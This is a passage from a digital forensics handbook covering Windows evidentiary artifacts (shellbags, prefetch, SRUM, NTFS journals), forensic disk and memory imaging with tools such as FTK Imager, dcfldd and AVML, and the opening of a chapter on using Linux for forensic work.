Chapter 8 - Artifacts as Evidence 163
Significance:
• Identifying malware persistence which can lead to the discovery of Indicators of Compromise
(IOCs).
• Proving the presence of removable media in a particular time frame, which can further help
with the acquisition of the same.
• Retrieving crackable user password hashes from the SAM and SYSTEM hives, which might
help access the encrypted partitions if the password was reused.
Shellbags
About:
• Shellbags were introduced in Windows 7. It is a convenience feature that allows the operating
system to remember Windows Explorer configuration for user folders and a folder’s tree
structure.
• Whenever a folder is created, selected, right-clicked, deleted, copied, renamed, or opened,
shellbag information will be generated.
• Depending on the Windows version, shellbag information can be stored in either ntuser.dat,
UsrClass.dat, or both.
Significance:
• Reconstructing the tree structure for deleted folders. Helpful in providing an idea of the files
that used to exist when they cannot be carved from the unallocated space.
• Disproving denial of content awareness. If a subject claims that they were simply not aware of
something existent on their system, shellbags can disprove their claims with an obvious given
that an exclusive usage of the machine was proven.
• Getting partial information about the contents of removable media that were once mounted
on the system.
Prefetch
About:
• Prefetch was first introduced in Windows XP. It is a memory management feature that
optimizes loading speeds for files that are frequently executed. Originally it was meant for
faster booting times, but since has been developed for applications too. Hence, this artifact is
direct evidence of execution.
• We looked at the lifecycle of an application earlier, the prefetcher in Windows works in the
same way. It studies the first ∼10 seconds of an application launched and creates/updates the
corresponding prefetch file, for faster loading speeds on the next execution.
Chapter 8 - Artifacts as Evidence 164
• Starting from Windows 10, prefetch files are compressed by default to save considerable
disk space. It uses the Xpress algorithm with Huffman encoding. For validation purposes,
forensicators must decrypt their prefetch files first. Thank you Eric¹⁹³ for this handy Python
script¹⁹⁴ for the same.
16.6 - Working of Windows Prefetcher
It has three working modes:
Value Description
0 Disabled
1 Application prefetching enabled
2 Boot prefetching enabled
3 Application & Boot prefetching enabled
This value is set from the registry key:
HKLMSYSTEMCurrentControlSetControlSession ManagerMemory ManagementPrefetchParameters
Forensicators can refer to this key to check if prefetching is disabled.
¹⁹³https://twitter.com/ericrzimmerman
¹⁹⁴https://gist.github.com/EricZimmerman/95be73f6cd04882e57e6
Chapter 8 - Artifacts as Evidence 165
Significance:
• Since it is evidence of execution, it helps identify anti-forensic attempts at bypassing detection.
Any automated anti-forensic tools ran would in turn result in its own prefetch file being
generated.
• Useful in identifying and hunting ransomware executed. Once identified, analysts can look for
publicly available decryptors to retrieve encrypted files.
• By studying files and directories referenced by an executable, analysts can identify malware
families.
• Application execution from removable media or deleted partitions can be identified from the
volume information parsed.
• Timestamps for the last eight executions and the run counter are useful for frequency analysis
of malicious executables. Worms which would result in multiple prefetch files referencing the
exact same resources is a prime example of this.
Jumplists & LNK files
About:
• LNK files or link files are the shortcuts that a user or an application creates for quick access
to a file. LNK files themselves are rich in file metadata such as timestamps, file path, file hash,
MAC address, volume information, and volume serial numbers.
• However, apart from the Recent Items and Start Menu folders, these LNK files are also found
embedded in jumplists.
• Jumplists were first introduced in Windows 7. It is a convenience feature of the Windows
Taskbar, that allows a user to have quick access to recently used files in or by different
applications. It automatically creates these ‘lists’ in the right-click context menu which can
be used to ‘jump’ to induce a frequently used action.
• There are two types of jumplists; automatic and custom. Automatic jumplists are those created
automatically by Windows, based on the MRU and MFU items. Custom jumplists are those
explicitly created by the user, like bookmarks in a browser or pinning files for instance.
• Both categories of these jumplists provide rich information like modified, accessed, and created
timestamps, and absolute file path of the original file.
Significance:
• Useful to gain information on uninstalled applications and deleted files from the system & also
applications ran and files opened from removable media.
• Again, being direct evidence of execution, it can be useful in timelining executed applications
and opened files.
• Useful to discover partial user history including URLs and bookmarks.
Chapter 8 - Artifacts as Evidence 166
SRUDB.dat
About:
• SRUDB.dat is an artifact resulting from a new feature introduced in Windows 8, called SRUM
(System Resource Usage Monitor) which tracks and monitors different usage statistics of
OS resources such as network data sent & received, process ownership, power management
information, push notifications data and even applications which were in focus at times along
with keyboard and mouse events as per a new research¹⁹⁵.
• It is capable of holding 30-60 days worth of tracking data at a time.
• So far, we haven’t looked at an artifact that has been able to undoubtedly map a particular
process executed to a user. SRUDB.dat offers us this critical information directly. It is one of the
most valuable artifacts due to the multidimensional applications of SRUM by the OS itself.
Significance:
• Useful in mapping process to a user account. Especially useful in the scenarios of restricted
scope of acquisition.
• Useful in mapping a process to network activity such as bytes sent & received. Helpful in
identifying data exfiltration incidents.
• Useful in timelining and distinguishing network interfaces connected to, and hence potentially
estimate the whereabouts of the machine if those networks were distanced farther away from
one another.
• Useful in analyzing power management information such as battery charge & discharge level.
• Useful in stating awareness or lack thereof, of an application that would’ve been visible on
screen at one point in time, and the interaction with it by the means of input devices.
hiberfil.sys
About:
• hiberfil.sys was first introduced in Windows 2000. It is a file used by Windows for memory
paging, at the time of hibernations or sleep cycles. It is also used in case of power failures.
• Paging is a mechanism to store the current contents of the memory on disk, for later retrieving
them and continuing from the same stage. This prevents additional processing by applications
and optimizes resource allocation by the operating system. Windows also enhanced this to
allow faster startup times from sleep states.
• It uses the Xpress algorithm for compression. Volatility’s imagecopy plugin can be used to
convert this artifact to a raw memory image.
¹⁹⁵https://aboutdfir.com/app-timeline-provider-srum-database/
Chapter 8 - Artifacts as Evidence 167
Significance:
• This is one of those artifacts which hops around its categorical type, and so this extra memory
content can provide more information to your investigation.
• To tackle accepting unfortunate shutdowns of locked devices in an investigation, one can
retrieve this file at the time of disk forensics and get additional information by performing
memory forensics on the converted file. This way we can retain partial volatile memory data.
• May contain NTFS records, browsing history, index records, registry data, and other useful
information.
pagefile.sys
About:
• Similar to hiberfil.sys, pagefile.sys is a swapping file used by Windows to temporarily
store new contents that were supposed to be loaded in the memory but could not due to
insufficient space. When the required amount of memory is freed, contents are transferred
from this artifact back to the memory.
• The only known methods to get some information from this artifact are using the string utility,
a hex editor, and filtering using regex.
• It can store chunks of data capping at 4kb in size.
Significance:
• Useful in hunting IOCs in malware cases.
• Useful in carving smaller files that were meant to be loaded into the memory. Meaning it is
evidence of access. If an image was successfully carved from this artifact, it means that it was
opened, as it would have meant to be eventually loaded in the working memory of that device.
• May contain NTFS records, browsing history, index records, registry data, and other useful
information.
$MFT
About:
The next few artifacts, including this one, are a part of the NTFS file system - one of the most
common file systems encountered when working with Windows OS.
• MFT stands for Master File Table. It is a record of every file that exists or once existed on that
particular file system.
• It also contains other information like path to that file, file size, file extension, MACB
timestamps, system flags, whether it was copied or not, etc.
Chapter 8 - Artifacts as Evidence 168
• Sometimes if the file size is small enough to be accommodated by the MFT entry, we can even
retrieve the resident data from the record entry itself. Typically MFT entry is 1024 bytes long,
and small files can very well be completely fitting in this range. It is known as MFT slack space.
Significance:
• Files that were deleted, may still have an intact MFT record entry if not overwritten.
• Useful in retrieving smaller files from the record itself and the file history on disk.
• Important metadata like MACB timestamps can be obtained.
$I30
About:
• $I30 is called the index attribute of the NTFS file system. A $I30 file corresponding to each
directory is maintained by the NTFS file system as the B-tree would be constantly balancing
itself as different files are created or deleted.
• $I30 is not a standalone file or artifact but a collection of multiple attributes of the file system.
Attribute files like the $Bitmap, $INDEX_ROOT, and $INDEX_ALLOCATION. The 30 in its name comes
from the offset for $FILE_NAME in an MFT record.
• It keeps track of which files are in which directories, along with MACB timestamps and file
location.
• It also has slack space, similar to $MFT, but again for smaller files.
Significance:
• Original timestamps for deleted files can be retrieved.
• Useful in the detection of anti-forensic tools and timestamping as the timestamps are $FILE_-
NAME attribute timestamps which are not easily modifiable or accessible through the Windows
API.
• Important metadata like MACB timestamps can be obtained.
$UsnJrnl
About:
• The NTFS file system has a journaling mechanism, which logs all the transactions performed
in the file system as a contingency plan for system failures and crashes. This transaction data
is contained in the $UsnJrnl attribute file.
Chapter 8 - Artifacts as Evidence 169
• $UsnJrnl, read as USN Journal, is the main artifact which contains two alternate data streams
namely $Max and $J, out of which $J is highly of interest for forensicators. It contains critical
data such as if a file was overwritten, truncated, extended, created, closed, or deleted along
with the corresponding timestamp for that file update action.
• $UsnJrnl tracks high-level changes to the file system, like file creation, deletion, renaming data,
etc.
Significance:
• Useful to support or deny timestamp metadata. Potential evidence of deleted and renamed files.
i.e., evidence of existence.
• The slack space for this artifact isn’t managed at all, so additional data could be carved. Since
it only keeps the data for some days, carving can be potentially useful for deleted records.
• Tracks changes to files and directories with the reason for the change.
$LogFile
About:
• This is yet another artifact used by the NTFS for journaling. The only difference is that$LogFile
is concerned with changes made to the MFT and not the entire NTFS file system itself. Meaning
it may directly contain data that was changed, similarly to how $MFT sometimes stores the files
if they’re small enough.
• These 4 artifacts, in a bunch can say a lot about an event or a transaction while performing file
system forensics.
• $LogFile tracks low-level changes to the file system, like data that was changed.
Significance:
• Detect anti-forensic attempts targeted on the $MFT since $LogFile contains changes made to it.
• Tracks changes made to $MFT metadata such as MACB timestamps.
• Could help reconstruct a chronological list of transactions done to the files on the file system.
Chapter 8 - Artifacts as Evidence 170
References
16.1 - Scientific law versus Scientific theories, by GliderMaven, under CC BY-SA 4.0¹⁹⁶, via
Wikimedia Commons¹⁹⁷
16.2 - The relationship between e-discovery and digital forensics, from 6th slide in DVD included
with E-Discovery: An Introduction to Digital Evidence¹⁹⁸, via YouTube¹⁹⁹
16.3 - Role of an Operating System, by Kapooht, CC BY-SA 3.0²⁰⁰, via Wikimedia Commons²⁰¹
16.4 - Our perception of truth depends on our viewpoint 2.0, by losmilzo²⁰², via Imgur²⁰³
16.5 - Puzzle Multicoloured Coloured, by Stefan Schweihofer²⁰⁴, under Simplified Pixabay License²⁰⁵,
via Pixabay²⁰⁶
¹⁹⁶https://creativecommons.org/licenses/by-sa/4.0
¹⁹⁷https://commons.wikimedia.org/wiki/File:Scientific_law_versus_Scientific_theories.png
¹⁹⁸https://www.amazon.com/Discovery-Introduction-Digital-Evidence-DVD/dp/1111310645
¹⁹⁹https://www.youtube.com/watch?v=btfCf9Hylns
²⁰⁰https://creativecommons.org/licenses/by-sa/3.0
²⁰¹https://commons.wikimedia.org/w/index.php?curid=25825053
²⁰²https://imgur.com/user/losmilzo
²⁰³https://imgur.com/gallery/obWzGjY
²⁰⁴https://pixabay.com/users/stux-12364/
²⁰⁵https://pixabay.com/service/license/
²⁰⁶https://pixabay.com/vectors/puzzle-multicoloured-coloured-3155663/
Chapter 9 - Forensic imaging in a
nutshell
By Guus Beckers²⁰⁷ | LinkedIn²⁰⁸
What is a disk image?
A disk image is a representation of data contained within a disk. It contains the contents of the entire
disk, including all files and folders. Dedicated forensic hardware appliances or software packages
ensure a bit-by-bit copy is performed. In other words, the contents of the disk image will match the
contents of the disk exactly. When an unexpected error has occurred, this will be flagged and the
forensicator will be notified. It is possible to make a disk image from every data source, including
desktop computers, laptops and servers, a USB-drive, an SD-card, or any other storage medium you
can think of.
While a complete discussion about file systems is outside the scope of this chapter, it is impossible
to touch upon forensic imaging and not talk about file systems. A file system entails the logical
representation of files and folders on the disk. It allows an operating system to keep track of files
as well as other important file properties such as its location, size, file format, and any associated
permissions. There are different files systems used across operating systems. The NTFS file system
is currently used by all supported versions of Microsoft Windows. APFS is used by devices created
by Apple, it is used across a wide range of devices including phones, tablets, TV appliances,
and computers. Lastly, there is the Linux operating system, which uses a variety of file systems,
depending on the version which is installed. Common varieties include ext3/ext4 and btrfs. More
specialized file systems for specific appliances are also in use. The exact intricacies and technical
documentation of a file system are often not available outside of its vendor which means that
software vendors have to reverse engineer a file system to a degree. Expect a forensic investigation
suite to continually improve support for popular file systems.
²⁰⁷http://discordapp.com/users/323054846431199232
²⁰⁸https://www.linkedin.com/in/guusbeckers/
Chapter 9 - Forensic imaging in a nutshell 172
Once a disk image has been created it is possible to calculate its checksum. A checksum can be
used to verify the integrity of a disk image. This is of paramount importance during a forensic
investigation. Evidence will always need to be retrieved from other systems. Calculating a checksum
at both ends, the source and destination file(s), will ensure that no anomalies are present. When a
checksum matches at both ends, this means that no anomalies are present, the contents of the file
match exactly and can be used in a forensic investigation. In order to create a checksum, a hash is
created. A hash is a mathematical, one-way calculation, performed by a specific algorithm. The MD5
and SHA1 algorithms are commonly used in the forensic community although other algorithms can
be used as well.
After validation of the checksum, the created image will be ready to use in an investigation. Forensic
investigation suites will use the disk image as a basis for the investigation, allowing a forensicator
to browse the file system for pertinent files and other forensic artifacts. Post-processing will also
occur in many forensic suites, automatically parsing popular artifacts, thereby making investigations
easier.
Chapter 9 - Forensic imaging in a nutshell 173
Creating a disk image
There are different ways to create a disk image, this section will discuss the most popular methods. Be
aware that different scenarios might require different imaging methods. The following subsections
are not intended to be ranked in order of preference.
Using a forensic duplicator
Forensic duplicators come in many shapes and sizes, however it’s most common variety is a portable
hardware appliance that can be easily transported and can be used both in a lab environment or on-
site at a client. A forensic duplicator can be used to create disk images of various physical media
types. In order to do this, it distinguishes between source and destination drives. Source drives
are generally connected to the left side of the device while destination drives are connected to the
right side of the device. Be sure to confirm this with individual duplicators as there might be
deviations. Forensic duplicators support a range of different connectivity methods such as SATA,
IDE, and USB. The ports supported by a duplicator are mirrored on either side of the device. Ensure
that the correct drives are connected to the correct side of the device prior to imaging. Failure
to do this might result in data erasure. Specialized duplicators also support SAS or an Ethernet
connection to image from a computer network.
Duplicators are used to perform the following functions:
• Clone a disk to a different disk
• Clone a disk to an image
• Format or wipe a disk
• Calculate hashes and verify its integrity
• Detection of a HPA or DCO
• Blank disk detection, verifying whether a disk is entirely blank or contains data
Chapter 9 - Forensic imaging in a nutshell 174
Using a Live USB
In scenarios in which it is not feasible to get access to physical media, a Live USB might provide an
alternative. A Live USB contains an operating system which can be booted during the boot phase
of a computer. In order for a live USB to function it is required to interrupt the boot cycle of a
computer and select the boot from USB option. Manufacturers have different hotkeys to access this
functionality. Note that it is also possible to boot from a CD/DVD in a similar manner, in that case,
select the CD/DVD option. While it is still necessary to take a server or service offline, it is not
required to open it up and take a hard drive. Similarly, continuous miniaturization means that some
SSDs can no longer be removed from a motherboard.
Luckily there are a number of free Live USB tools that can be used to circumvent these limitations and
acquire forensic images. One of the most well known tools is CAINE (Computer Aided Investigative
Environment)²⁰⁹. CAINE is a Linux live environment and mounts any discovered drives as read-only
by default to ensure the forensic integrity of the disks. It provides GUI-based tools for the following
operations:
• Imaging of a disk (Guymager)
• Disk Image Mounter (Xmount)
• DDrescue
• Enabling write operations
• Mounting remote file systems across a network
In addition to its disk imaging tools, it provides a forensic environment which can be used to perform
most forensic operations including accessing various file systems, recover data, performing memory
analysis and other operations.
Another example of a forensic Live USB environment is Sumuri Paladin Edge²¹⁰. This Live USB
environment is available free of charge. In addition to imaging the entire disk, it also allows you to
convert images, find specific files, extract unallocated space, and interface with network shares.
It is recommended to have a Live USB option within your lab at all times and to equip your
forensicators with USB drives in case of onsite client emergencies.
²⁰⁹www.caine-live.net
²¹⁰https://sumuri.com/paladin/
Chapter 9 - Forensic imaging in a nutshell 175
Disk imaging on Windows and Linux
Situations might occur when a particular system cannot be turned off. There are various ways to
perform a forensic acquisition depending on the operating system.
Windows
FTK Imager²¹¹ is a well-known tool to perform disk acquisitions on a Windows host. It is part of
the FTK forensic suite developed by Exterro (formerly AccessData). However, the imager is also
available free of charge. FTK Imager can either be installed on the host operating system or it can
be used in a “lite” mode. Lite mode is preferable as no changes are performed on the disk, however
be aware that it affects RAM memory.
FTK Imager can be used to perform the following operations:
• Disk acquisitions (both physical and logical)
• Memory acquisitions
• Acquisitions of the Windows Registry
• Browse the filesystem and select relevant files/folders
The following steps can be used to create a “Lite” version which runs in memory. These steps are
based on the official guide provided by Exterro to the forensic community:
1. Install FTK Imager on another workstation
2. Insert a USB drive
3. Copy the installation folder to the USB-drive
4. Perform a hashing operation to ensure file integrity is in order
²¹¹https://www.exterro.com/forensic-toolkit
Chapter 9 - Forensic imaging in a nutshell 176
Linux
Linux historically has an integrated utility capable of copying files called dd. dd can also be used
for disk imaging, however it was not build with forensics in mind. A duo of utilities is available
to perform forensic disk imaging called dcfldd and dc3dd. Both tools can be used to perform disk
imaging, however, their main advantage over dd is integrated hashing support for various hashing
algorithms.
All three utilities utilize the available Linux block devices in /dev/ to perform a physical disk image
capture. An example of dcfldd is included below. Be warned that these tools can and will destroy
evidence if used incorrectly. in this particular instance a 976 MB USB stick was inserted and the
block storage device sdb1 is used. In this case a MD5 hash is generated, the hash log is available in
the home folder along with the image.
dcfldd if=/dev/sdb1 conv=sync, noerror hash=md5 hashwindow=976M hashlog=/home/ex
ample/hash.txt hashconv=after of=/home/example/image.dd
Virtual machines
Virtual machines have become commonplace in the IT industry, in short allowing an organization
to scale resources without purchasing additional hardware. The use of virtual machines is also
advantageous for imaging purposes. A client can offer to send the virtual hard drive files for forensic
investigation. After performing the customary hashing procedures these files can then be converted
if necessary. FTK Imager supports conversion of VMDK files to any other FTK image format, which
in turn can be used by a forensic program or forensic suite.
qemu-img²¹² can be used to convert various hard drive image formats to raw dd format. An example
covering the conversion of a VMDK file is included below.
qemu-img convert -f vmdk -O raw image.vmdk image.img
²¹²https://qemu.readthedocs.io/en/latest/index.html
Chapter 9 - Forensic imaging in a nutshell 177
Memory forensics
Background
While the disk forensics focus on forensic artifacts from files and folders, more pertinent information
can also be readily available within a computer’s memory. A computer’s memory, called Random
Access Memory, or RAM for short, is used to carry out all active tasks of a computer. As such, it
contains a wealth of artifacts not available through other means. For instance:
• A list of active and (potentially) recently terminated processes
• Active network connections
• Entered system commands
• Open file handles
In order to collect this information, an application will perform a memory dump. A memory dump
is exactly what it sounds like, the contents of the RAM extracted to a disk. Be aware that as the size
of the RAM increases, an equivalent amount of disk space should be readily available for storage.
Furthermore, the RAM does not remain in stasis while the extraction takes place. It will continue to
perform tasks and will continue to change for the duration of the RAM dump.
Windows
Performing a memory dump on Windows can be performed by multiple tools. FTK Imager was
already mentioned in the previous section. An alternative to FTK Imager in this regard is the utility
DumpIt²¹³. DumpIt can be used without installation on the host system. The directory it is launched
from also doubles as the destination directory. Take this into consideration before performing a
memory dump.
Linux
There is no single version of Linux, every single distribution has its own intricacies and (minor)
differences. A tool was needed that can perform a memory dump independent of installed kernels,
packages, or other dependencies. Microsoft actively develops AVML²¹⁴. AVML can be used to perform
a memory dump and also has a few tricks of its own. AVML supports compression of memory dumps
to decrease the amount of required disk space as well as uploads to a Microsoft Azure Blob store.
²¹³https://github.com/thimbleweed/All-In-USB/tree/master/utilities/DumpIt
²¹⁴https://github.com/microsoft/avml
Chapter 9 - Forensic imaging in a nutshell 178
The standard usage of AVML is shown below:
avml output.lime
It is possible to generate a compressed image with the following command:
avml —compress output.lime.compressed
For a full set of commands please refer to the GitHub development page.
Virtual Machines
Prevalent use of virtual machines impacts memory acquisition as well with its own advantages
and disadvantages. One advantage is that memory collection has become easier. A virtual machine
hypervisor allows a virtual machine to be suspended, hitting the pause button, and freezing all
activity. During this process the contents of the RAM are written to disk, no additional tools are
necessary to perform an acquisition. Files from popular vendors like VMware and Virtualbox can
be analyzed by memory analysis tools like Volatility.
Chapter 9 - Forensic imaging in a nutshell 179
Next Steps and Conclusion
This chapter was designed to hit the ground running and assist a forensicator with imaging a
desktop or server. What’s next in the investigation relies completely upon the research questions
and associated context of the case itself. One final tip this chapter can provide is to focus on triage
first and foremost. SANS has developed a poster for this specific scenario as part of its FOR500 and
FOR508 courseware. It can be found at https://www.sans.org/posters/windows-forensic-analysis/.
For tips on scaling triage, check out Chapter 11 of this book, written by the same author.
Chapter 10 - Linux and Digital
Forensics
By Barry Grundy²¹⁵ | Website²¹⁶ | Discord²¹⁷
What is Linux?
There are plenty of resources available on what Linux is, what roles it fills, and how it compares
with other operating systems. Here we will discuss Linux from the perspective of digital forensics
and incident response.
There have been many discussions about what defines Linux. The classical definition is that Linux
is a kernel (the “brains” of the operating system) augmented by user space drivers, utilities, and
applications that allow us to interact with a computer in a useful manner. For the sake of simplicity,
we extend the name “Linux” to encompass the entire operating system and even the applications
that can be bundled and distributed.
Linux was developed by Linus Torvalds at the University of Helsinki back in the early 1990s. It was,
essentially, a “hobby” version of UNIX created for PC hardware.
²¹⁵https://github.com/bgrundy
²¹⁶https://linuxleo.com
²¹⁷http://discordapp.com/users/505057526421913600
Chapter 10 - Linux and Digital Forensics 181
On 25 August 1991, Torvalds posted this to the Usenet group comp.os.minix:
Hello everybody out there using minix
I’m doing a (free) operating system (just a hobby, won’t be big and
professional like gnu) for 386(486) AT clones. This has been
brewing since april, and is starting to get ready. I’d like any
feedback on things people like/dislike in minix, as my OS resembles
it somewhat (same physical layout of the file-system (due to
practical reasons) among other things).
I’ve currently ported bash(1.08) and gcc(1.40), and
things seem to work. This implies that I’ll get something
practical within a few months, and I’d like to know what features
most people would want. Any suggestions are welcome, but I won’t
promise I’ll implement them :-)
Linus (torvalds@kruuna.helsinki.fi)
PS. Yes - it’s free of any minix code, and it has a
multi-threaded fs. It is NOT portable (uses 386 task switching
etc), and it probably never will support anything other than
AT-harddisks, as that’s all I have :-(.
–Linus Torvalds (quoted from Wikipedia²¹⁸)}
Modern Linux is an operating system very similar to Unix, deriving most of its functionality from
the much older AT&T Unix originally developed in the 1970s. This included a full TCP/IP stack and
GNU development tools to compile programs. In short, Linux is mostly compliant with the Portable
Operating System Interface for Unix (POSIX).
Despite the warnings of lack of architecture portability and limited support mentioned by Torvald’s
postscript, Linux has grown to a fully functioning operating system that supports a great deal of
modern hardware. Standard SATA hard drives through modern M.2 and NVMe storage are robustly
supported. Drivers and software support for newer motherboards and associated hardware are
constantly improving and growing. The Linux kernel, where most of this support resides, has a
very fast production cycle, and support for newer devices (where specifications are available) is
rapidly added in most cases.
For the digital forensics practitioner, this hardware compatibility issue can be exceedingly important.
Not only must we verify and test that our hardware is properly supported and functioning as
intended; but we also need to ensure that any subject hardware we might need to directly attach
to our system (which we might do for a variety of reasons) is also properly detected and supported.
This is often done via a direct physical connection, or via boot media on a subject system.
While we have given a very general definition of what Linux is and where it originated, we should
also mention what Linux is not, particularly where digital forensics is concerned. We will cover why
you might want to use Linux for digital forensics in a later section, but for now, a beginner forensics
²¹⁸https://en.wikipedia.org/wiki/History_of_Linux#The_creation_of_Linux
Chapter 10 - Linux and Digital Forensics 182
examiner should know that Linux is not a platform well-suited to “point-and-click”, or what some
might refer to as “Nintendo forensics” techniques. While there are graphical user interface (GUI)
tools available for Linux, it is not the strongest OS for that approach. More on that later.
Linux can be fairly easy to install, particularly given modern desktop GUI front ends for configura-
tion and settings. However, Linux is NOT a “better Windows”. Linux should not be approached as
a replacement to Microsoft Windows - one that acts like Windows and is supposed to be familiar
to someone who has been using Windows (or macOS for that matter) for years. Linux works very
differently from some more mainstream operating systems. There is a steep learning curve and
troubleshooting can seem overwhelming to someone used to running Windows on their computer.
It is possible to use Linux as a primary driver for digital forensics, and many digital forensic
practitioners have done this for years. That said, while Linux can be a fantastic learning tool and a
great way to access forensic and operating system utilities on an alternative platform, it will remain
a secondary operating system for most people new to the field.
Now that we have a very basic idea of what Linux is and is not, let’s discuss why we might decide
to add it to our digital forensic toolbox.
Why Linux for Digital Forensics
There are any number of reasons for choosing to learn and run Linux for use as a digital forensics
platform. We will cover the more important ones here.
Education
If you are a student of digital forensics or a practitioner looking to better understand a particular
forensic process, Linux provides an excellent environment for learning.
Particularly for students, the sheer number of free tools available for Linux - not to mention the
standard operating system utilities - make it accessible to all levels of income. No need for expensive
licenses or dongles to be able to do a full analysis or participate in training. While it is true that many
open source digital forensics utilities will compile and run natively on Windows, the ability to run
multiple copies of Linux, either on physical computers or virtual machines, still makes it an attractive
alternative for learning.
Many of the tools available for digital forensics on Linux are meant to be used with the command
line interface (CLI). To a beginner, it can certainly appear to be daunting. But learning at the CLI
removes the clutter of a GUI and all the menus and mouse clicks required to complete a task. Most
Unix tools adhere to the philosophy that they should do one thing, and do it well. As you learn what
each tool does and how it works, you can string commands together to accomplish a whole series
of steps with one command using multiple tools all at once (commonly referred to as piping). This
approach allows you to concentrate on the results rather than on an interface with multiple windows
and views to sort through. Again this is a benefit for education specifically. There is no doubt that
a forensic software suite that ingests, analyzes evidence, and presents the results in a single step is
Chapter 10 - Linux and Digital Forensics 183
more efficient. But learning from the CLI with specific and very targeted output can be immensely
powerful for students.
Free(dom)!
Freedom and flexibility are just two of the many attributes that can help make Linux a useful
addition to a forensic examiner’s toolbox.
First and foremost, of course, Linux is free. As mentioned earlier, this means we can install it as
many times on as many computers (or virtual machines) as we like. You can use it as any sort of
server while not tying up valuable budget resources on licensing. This goes for the forensic software
as well. You can install, copy, and share across multiple platforms and users, again without breaking
the bank.
For a practitioner learning the ins and outs of digital forensics, this can be very powerful. You
can install multiple copies of Linux across devices and virtual environments in a simple home lab;
deleting, reinstalling, and repurposing computer resources along the way. Installing and running
Linux is a great way to re-purpose old hardware, which brings us to our next point.
Linux provides unparalleled flexibility. It will run on all forms of hardware, from laptop and
desktop computers, to mobile devices and single board computers (SBC). It will run in a variety
of virtualization environments, up to and including Microsoft Windows’s own Windows Subsystem
for Linux (WSL/WSL2). You can choose to run a Linux distribution on a workstation, on a $50
Raspberry Pi, in a virtual machine, or natively in Windows using WSL. These all have their benefits
and drawbacks including cost, direct hardware access, convenience, and resource requirements.
Another facet of Linux’s flexibility lies in the number of choices, freely available, that users have
over their working environment. Desktop environments like KDE/Plasma²¹⁹, Gnome²²⁰ and XFCE²²¹
provide a wide range of choices that a user can customize for aesthetics or workflow efficiency. These
desktop environments don’t change the underlying operating system, but only the way one interacts
with that system. Paired with a separate window manager, there are hundreds of possibilities for
customization. While it may sound trivial, we are not discussing wallpaper and icon themes here.
We are talking about the flexibility to decide exactly how you interact with your workstation.
For example, you can set up a Linux environment that focuses on primarily CLI usage where the
keyboard is the primary interface and the mouse is rarely needed. This can be done with a wide
selection of “tiling” window managers that open new windows in a pre-determined arrangement and
allow for window manipulation, multiple workspaces, and program access all through customizable
keystrokes and little or no use for a mouse. This is certainly not a configuration that will appeal to
everyone, but that is one of the joys of Linux - the ability to completely customize it to match your
particular workflow.
²¹⁹https://kde.org/plasma-desktop/
²²⁰https://www.gnome.org/
²²¹https://www.xfce.org/
Chapter 10 - Linux and Digital Forensics 184
Control
Another traditional benefit of Linux over other operating systems has historically been the control
it provides over attached devices. This has always been one of the more important factors when
adopting Linux in the context of a forensic workstation. Most operating systems are designed to
isolate the user from the inner workings of hardware. Linux, on the other hand, has traditionally
allowed for much more granular control over attached devices and the associated drivers. This has
blurred somewhat in recent years with a number of popular Linux versions becoming more desktop-
oriented and relying more and more on automation and ease of operation. While this approach does
hide some of the control options from the user, they are generally still available.
Again, with advances in recent years, this level of hardware control is not as exclusive to Linux as
it once was.
Cross verification - An Alternate OS Approach
All of the preceding might come across as pushing Linux as a superior operating system for digital
forensics. That is most certainly not the intention. Rather, an effort has been made to point out the
strengths of Linux in comparison to other platforms. In reality, having Linux in your digital forensics
arsenal is simply having access to a particularly powerful alternative tool.
It is absolutely possible to utilize Linux as a primary digital forensic platform in today’s laboratory
environment. It is also a reality that providing timely and usable information for non-technical
investigators and managers often means utilizing the reporting and data sharing functionalities
available in modern forensic software suites that most often run under mainstream operating
systems and not Linux.
So where does Linux fit into a modern laboratory where reality and caseload dictate the use of
software suites with automated functionality?
As an alternative operating system, Linux is often used to troubleshoot hardware issues where one
platform either cannot detect or cannot access particular media. Linux is well known for its ability
to provide better diagnostic information and sometimes better detection for damaged or otherwise
misbehaving devices. When dealing with difficulties accessing a hard drive, for example, you will
often hear the advice “connect it to a Linux box”. Being able to directly monitor the kernel buffer
and view the interactions between hardware and the kernel can be a great help in solving hardware
issues.
There is also the benefit of having a completely different operating system utilizing a different toolset
for cross-verification of findings. In some organizations, the cross-verification of significant analysis
results is a requirement. Depending on the situation, validating a result can make good sense even
when it is not explicitly required. Cross verification means that if a practitioner finds an artifact or
draws a particular conclusion on a given piece of evidence, the finding can be reproduced using a
different tool or technique.
Chapter 10 - Linux and Digital Forensics 185
Consider the following simplified example:
1. A forensic examiner extracts user-created contents (documents, emails, etc.) from computer
media and provides the data to an investigator using a common Windows forensic software
suite.
2. The investigator identifies a particular document that can be considered valuable to the case
being investigated and requests a report specific to that document.
3. The forensic examiner provides a targeted report detailing the document’s properties: times-
tamps, ownership, where or how it might have originated on the media, etc.
4. The forensic examiner re-analyzes the specific document using a completely different tool
perhaps on a completely different operating system (Linux in this case). Does the alternate
tool identify the same location (physical disk location)? Are the timestamps the same? Is the
document metadata the same? Differences, if any, are investigated and explained.
The cross verification outlined above is somewhat simplified, but it provides an outline of how Linux
can be employed in a laboratory environment dominated by Windows software and the need for
efficient reporting. Using an alternative operating system and unique open source tools to cross-
verify specific findings can help eliminate concerns about automated processes and the integrity of
reports.
Another benefit of using Linux to cross-verify findings is that you will learn the OS as you integrate
it into your workflow rather than simply installing it and trying to make time to learn.
Choosing Linux
How does one start a journey into using Linux for digital forensics? We begin with a discussion of
distributions and selecting your platform’s “flavor” of Linux.
Distributions
A Linux distribution (or “distro” for short) is a collection of Linux components and compiled open-
source programs that are bundled together to create an operating system. These components can
include a customized and packaged kernel, optional operating system utilities and configurations,
custom-configured desktop environments and window managers, and software management utili-
ties. These are all tied together with an installer that is usually specific to the given distribution.
Because of the open-source nature of the Linux environment, you could grab all the source code for
the various components and build your very own distribution, or at least a running version of Linux.
This is often referred to as “Linux from Scratch” (LFS). With a distribution, the developers do all the
